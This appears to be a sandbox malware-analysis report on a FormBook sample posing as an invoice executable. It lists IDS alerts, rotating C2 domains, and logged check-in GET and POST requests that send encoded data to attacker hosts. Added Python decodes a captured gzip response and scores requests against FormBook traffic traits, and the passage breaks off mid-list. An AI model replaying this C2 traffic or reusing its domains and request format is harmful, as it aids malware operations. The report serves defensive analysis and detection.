Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49825 -> 209.74.77.109:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 38.47.232.202:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 149.88.81.190:80
Source: DNS query: www.optimismbank.xyz
Source: Joe Sandbox View | IP Address: 209.74.77.109
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: Joe Sandbox View | ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe | Code function: 0_2_002C22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_002C22EE
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | date: Mon, 02 Dec 2024 14:24:57 GMT | server: Apache | set-cookie: __tad=1733149497.5221456; expires=Thu, 30-Nov-2034 14:24:57 GMT; Max-Age=315360000 | vary: Accept-Encoding | content-encoding: gzip | content-length: 576 | content-type: text/html; charset=UTF-8 | connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 14:25:00 GMTserver: Apacheset-cookie: __tad=1733149500.1835738; expires=Thu, 30-Nov-2034 14:25:00 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c 
a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 02 Dec 2024 14:25:03 GMTserver: Apacheset-cookie: __tad=1733149503.5138422; expires=Thu, 30-Nov-2034 14:25:03 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c 
a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
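The Data Ascii column of the three HTTP/1.1 200 OK responses above is unreadable because the body is gzip-compressed (the headers say content-encoding: gzip, content-length: 576), so the ASCII rendering of the raw bytes is meaningless. The Python below is an added example, not part of the Joe Sandbox report: it takes the 576 hex bytes copied from the Data Raw column (the body is byte-identical in all three responses; only the date and set-cookie headers differ), checks the RFC 1952 header, reads the CRC32 and ISIZE fields from the trailer, inflates the member with zlib and verifies the result against the trailer before returning it. The function names are mine; the only data from the page is the hex constant and the content-length value.

```python
import struct
import zlib

# Gzip response body copied from the "Data Raw" column of the 200 OK responses
# above (576 bytes, matching the content-length header on the same row).
RESPONSE_BODY_HEX = """
1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30
10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c
0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0
a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e
6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19
ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de
0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04
af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0
e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07
8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4
7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0
0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd
0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30
0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3
3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb
ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb
a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33
c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0
b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3
67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43
d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47
56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b
f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec
a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2
74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23
21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57
9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b
5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6
cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62
79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa
c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38
09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52
28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f
f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99
2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3
68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00
"""
CONTENT_LENGTH = 576  # content-length header from the same response row


def hex_dump_to_bytes(dump):
    """Turn a space/newline separated hex dump into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def gzip_envelope(blob):
    """Read the RFC 1952 header fields and the trailer without inflating."""
    if len(blob) < 18 or blob[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream (bad magic)")
    if blob[2] != 8:
        raise ValueError("unsupported compression method %d" % blob[2])
    crc32, isize = struct.unpack("<II", blob[-8:])  # little-endian trailer
    return {"flags": blob[3], "os": blob[9], "crc32": crc32,
            "isize": isize, "size": len(blob)}


def inflate_checked(blob):
    """Inflate one gzip member and verify it against the trailer's CRC32/ISIZE."""
    env = gzip_envelope(blob)
    data = zlib.decompress(blob, wbits=16 + zlib.MAX_WBITS)  # 16+ selects gzip framing
    if zlib.crc32(data) & 0xFFFFFFFF != env["crc32"]:
        raise ValueError("CRC32 mismatch: body is corrupt or truncated")
    if len(data) & 0xFFFFFFFF != env["isize"]:
        raise ValueError("ISIZE mismatch: body is corrupt or truncated")
    return data


def decode_report_response(dump, content_length):
    """Summarise a gzip body taken from the report's hex column; never guess."""
    blob = hex_dump_to_bytes(dump)
    info = gzip_envelope(blob)
    info["length_matches_header"] = (len(blob) == content_length)
    try:
        info["body"] = inflate_checked(blob)
        info["error"] = None
    except (zlib.error, ValueError) as exc:
        info["body"] = None
        info["error"] = str(exc)
    return info


if __name__ == "__main__":
    r = decode_report_response(RESPONSE_BODY_HEX, CONTENT_LENGTH)
    print("gzip bytes: %d  ISIZE: %d  CRC32: 0x%08x" % (r["size"], r["isize"], r["crc32"]))
    print(r["body"].decode("utf-8", "replace") if r["body"] else "inflate failed: " + r["error"])
```

The trailer check matters for sandbox captures: a body cut off by a connection reset or by the report's own column width still starts with a valid gzip header, and zlib will happily inflate a prefix of it, so comparing the inflated length and CRC32 with the trailer is the only cheap way to know the decoded HTML is the whole page the server sent.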
                Source: global traffic | HTTP traffic detected: GET /fev0/?wzcP=iLdd&bV=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/SU+87cwr0VJj825LSMeKmzjVPSaMyWz8le8KSNg+oL/g== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.thaor56.online | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.optimismbank.xyz | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.greenthub.life | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.laohub10.net | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.bankseedz.info | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.madhf.tech | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /hkgx/?wzcP=iLdd&bV=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvS5L8ubcdexDHAV6gjjxkBAdNrGiSX2pXpBWFAYYwVQiPg== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.xcvbj.asia | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.yc791022.asia | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.43kdd.top | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.jcsa.info | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.1secondlending.one | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.zkdamdjj.shop | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global traffic | HTTP traffic detected: GET /8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLdd HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Connection: close | Host: www.rgenerousrs.store | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
                Source: global trafficDNS traffic detected: DNS query: www.optimismbank.xyz
                Source: global trafficDNS traffic detected: DNS query: www.greenthub.life
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
                Source: global trafficDNS traffic detected: DNS query: www.madhf.tech
                Source: global trafficDNS traffic detected: DNS query: www.xcvbj.asia
                Source: global trafficDNS traffic detected: DNS query: www.yc791022.asia
                Source: global trafficDNS traffic detected: DNS query: www.43kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.jcsa.info
                Source: global trafficDNS traffic detected: DNS query: www.1secondlending.one
                Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: global trafficDNS traffic detected: DNS query: www.rgenerousrs.store
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: unknown | HTTP traffic detected: POST /98j3/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US | Accept-Encoding: gzip, deflate, br | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Content-Length: 203 | Connection: close | Host: www.optimismbank.xyz | Origin: http://www.optimismbank.xyz | Referer: http://www.optimismbank.xyz/98j3/ | User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 | Data Raw: 62 56 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 48 77 59 46 66 44 30 32 6d 6e 4b 51 33 72 76 32 57 6a 47 77 59 45 68 52 43 38 31 30 4a 69 4a 4a 30 51 72 48 58 4d 3d | Data Ascii: bV=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpHwYFfD02mnKQ3rv2WjGwYEhRC810JiJJ0QrHXM=
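The thirteen GET requests and the POST above share one shape: a four-character directory as the path, a short fixed parameter (wzcP=iLdd) next to a long base64-looking blob, the same Windows 7 (NT 6.1) Chrome/35 User-Agent on every request, Connection: close, plain HTTP, and a different Host each time, most of which answer 404 in the responses further down. The Python below is an added example, not part of the report and not FormBook's own code: it rebuilds those rows in wire form (the report flattens the CRLFs away), parses them without percent-decoding so the blobs keep their literal '+' and '/', scores each request on the traits just listed, and groups hosts by the shared short parameter to surface the decoy-domain rotation. The request list, User-Agent and POST body are copied from the rows above; the scoring threshold, the regexes, the benign control request and every function name are my assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The one User-Agent string sent on every request row in the report.
REPORT_UA = ("Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36")

# (method, Host, request target, POST body) copied from the request rows above.
REPORT_REQUESTS = [
    ("GET", "www.thaor56.online", "/fev0/?wzcP=iLdd&bV=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/SU+87cwr0VJj825LSMeKmzjVPSaMyWz8le8KSNg+oL/g==", None),
    ("GET", "www.optimismbank.xyz", "/98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd", None),
    ("GET", "www.greenthub.life", "/r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLdd", None),
    ("GET", "www.laohub10.net", "/n2c9/?bV=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvpOFGl3CcQklZlekjGrp+0XQqfczBPHNrv5hMhkDFTE+A==&wzcP=iLdd", None),
    ("GET", "www.bankseedz.info", "/uf7y/?bV=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7gow9os+aP1J4EzwTxXBX+A+Fa6CXCkfj46dm/6YpVTzCxw==&wzcP=iLdd", None),
    ("GET", "www.madhf.tech", "/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd", None),
    ("GET", "www.xcvbj.asia", "/hkgx/?wzcP=iLdd&bV=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvS5L8ubcdexDHAV6gjjxkBAdNrGiSX2pXpBWFAYYwVQiPg==", None),
    ("GET", "www.yc791022.asia", "/31pt/?bV=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0tkqytLQfQBhcOdFFeEx3iaXLjcxC54/kiaY/bAFrqB8g==&wzcP=iLdd", None),
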